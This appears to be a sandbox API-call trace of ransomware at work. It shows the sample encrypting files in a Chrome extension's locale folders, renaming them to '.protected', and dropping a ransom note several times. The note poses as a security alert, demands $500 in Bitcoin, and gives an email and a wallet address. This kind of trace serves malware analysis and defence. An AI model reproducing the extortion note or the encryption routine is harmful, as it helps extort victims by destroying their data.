cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\.") returned 152 [0083.777] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.777] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.777] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.777] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.777] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.777] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.777] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\..") returned 153 [0083.777] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.777] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.777] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.777] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.777] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.777] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.777] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.777] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.777] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json") returned 164 [0083.777] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.777] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.777] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.777] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.799] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.803] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json") returned 164 [0083.803] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.803] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json") returned 164 [0083.803] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.803] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json") 
returned 164 [0083.803] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.803] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.804] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.804] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.804] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.805] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.805] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.805] CloseHandle (hObject=0x168) returned 1 [0083.806] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.protected") returned 174 [0083.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.protected")) returned 1 [0083.807] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.807] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.807] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\RESTORE_FILES.txt") returned 168 [0083.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.807] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.808] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.808] lstrlenA (lpString="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") returned 684 [0083.808] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0083.808] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.808] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.808] CloseHandle (hObject=0x164) returned 1 [0083.808] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.808] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0083.808] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0083.809] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0083.809] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0083.809] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0083.809] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko") returned 150 [0083.809] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0083.809] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0083.809] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\*") returned 152 [0083.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0083.809] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.809] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.809] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.809] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.809] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.809] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\.") returned 152 [0083.809] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.809] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.809] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.809] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.809] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.809] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.809] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.809] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\..") returned 153 [0083.809] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.809] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.809] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.809] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.809] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.809] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0083.809] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.809] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.809] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json") returned 164 [0083.809] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.810] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.810] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.810] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json") returned 164 [0083.810] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json") returned 164 [0083.810] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.810] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json") returned 164 [0083.810] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.810] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.811] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.811] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.812] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.812] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.819] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.819] CloseHandle (hObject=0x168) returned 1 [0083.819] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.protected") returned 174 [0083.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.protected")) returned 1 [0083.820] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.820] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.820] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\RESTORE_FILES.txt") returned 168 [0083.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.821] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.821] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.821] lstrlenA (lpString="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") returned 684 [0083.822] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.822] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.822] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.822] CloseHandle (hObject=0x164) returned 1 [0083.822] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.822] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0083.822] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0083.822] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0083.822] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0083.822] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0083.822] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt") returned 150 [0083.822] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0083.822] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0083.822] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\*") returned 152 [0083.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.831] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.831] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.831] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.831] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.831] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.832] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\.") returned 152 [0083.832] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.832] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.832] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.832] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.832] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.832] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.832] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.832] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\..") returned 153 [0083.832] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.832] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.832] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.832] lstrcmpiW (lpString1="messages.json", 
lpString2="Windows") returned -1 [0083.832] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.832] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.832] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.832] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.832] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json") returned 164 [0083.832] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.832] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.832] 